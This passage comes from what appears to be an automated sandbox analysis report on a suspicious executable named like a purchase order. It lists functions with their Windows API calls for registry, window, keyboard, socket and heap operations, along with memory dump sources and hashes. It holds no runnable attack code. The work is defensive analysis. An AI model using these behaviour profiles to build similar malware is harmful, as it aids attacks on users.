                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                  • String ID:
                                  • API String ID: 4082120231-0
                                  • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                  • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                  • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                  • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                  Function 0046B280 Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                  • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                  • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                  • String ID:
                                  • API String ID: 2027346449-0
                                  • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                  • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                  • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                  • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                  Function 0047A66E Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                    • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                  • GetMenu.USER32 ref: 0047A703
                                  • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                  • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                  • _wcslen.LIBCMT ref: 0047A79E
                                  • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                  • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                  • String ID:
                                  • API String ID: 3257027151-0
                                  • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                  • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                  • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                  • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                  Function 0046D230 Relevance: 10.7, APIs: 7, Instructions: 170networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ErrorLastselect
                                  • String ID:
                                  • API String ID: 215497628-0
                                  • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                  • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                  • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                  • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                  Function 004443FC Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetParent.USER32(?), ref: 0044443B
                                  • GetKeyboardState.USER32(?), ref: 00444450
                                  • SetKeyboardState.USER32(?), ref: 004444A4
                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessagePost$KeyboardState$Parent
                                  • String ID:
                                  • API String ID: 87235514-0
                                  • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                  • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                  • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                  • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                  Function 004445F4 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetParent.USER32(?), ref: 00444633
                                  • GetKeyboardState.USER32(?), ref: 00444648
                                  • SetKeyboardState.USER32(?), ref: 0044469C
                                  • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                  • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                  • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                  • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessagePost$KeyboardState$Parent
                                  • String ID:
                                  • API String ID: 87235514-0
                                  • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                  • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                  • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                  • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                  Function 0045537F Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                  • 6FDC0200.COMCTL32(?,?), ref: 004553D3
                                  • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                  • DeleteObject.GDI32(?), ref: 00455736
                                  • DeleteObject.GDI32(?), ref: 00455744
                                  • DestroyCursor.USER32(?), ref: 00455752
                                  • 74285CF0.USER32(?), ref: 00455760
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: DeleteMessageObjectSend$74285C0200CursorDestroy
                                  • String ID:
                                  • API String ID: 2120126676-0
                                  • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                  • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                  • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                  • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                  Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                  • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                  • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                  • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                  Function 0044882A Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                  • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                  • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                  • EnableWindow.USER32(?,00000001), ref: 00448B72
                                  • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                  • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                  • EnableWindow.USER32(?,00000001), ref: 00448C09
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Window$Enable$Show$MessageMoveSend
                                  • String ID:
                                  • API String ID: 896007046-0
                                  • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                  • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                  • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                  • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                  Function 00448AB2 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                  • GetFocus.USER32 ref: 00448ACF
                                  • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                  • EnableWindow.USER32(?,00000001), ref: 00448B72
                                  • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                  • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                  • EnableWindow.USER32(?,00000001), ref: 00448C09
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Window$Enable$Show$FocusMessageSend
                                  • String ID:
                                  • API String ID: 3429747543-0
                                  • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                  • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                  • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                  • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                  Function 0045D448 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                  • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                  • __swprintf.LIBCMT ref: 0045D4E9
                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ErrorMode$InformationVolume__swprintf
                                  • String ID: %lu$\VH
                                  • API String ID: 3164766367-2432546070
                                  • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                  • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                  • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                  • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                  Function 00450B7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                  • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                  • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID: Msctls_Progress32
                                  • API String ID: 3850602802-3636473452
                                  • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                  • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                  • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                  • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                  Function 00455531 Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: 74285A0860DeleteObject$CursorDestroy
                                  • String ID:
                                  • API String ID: 1511269488-0
                                  • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                  • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                  • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                  • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                  Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • _malloc.LIBCMT ref: 0041F707
                                    • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                    • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                    • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                  • _free.LIBCMT ref: 0041F71A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: AllocateHeap_free_malloc
                                  • String ID: [B
                                  • API String ID: 1020059152-632041663
                                  • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                  • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                  • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                  • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                  Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                    • Part of subcall function 00436B19: RtlAllocateHeap.KERNEL32(00000000), ref: 00436B24
                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                  • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                  • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
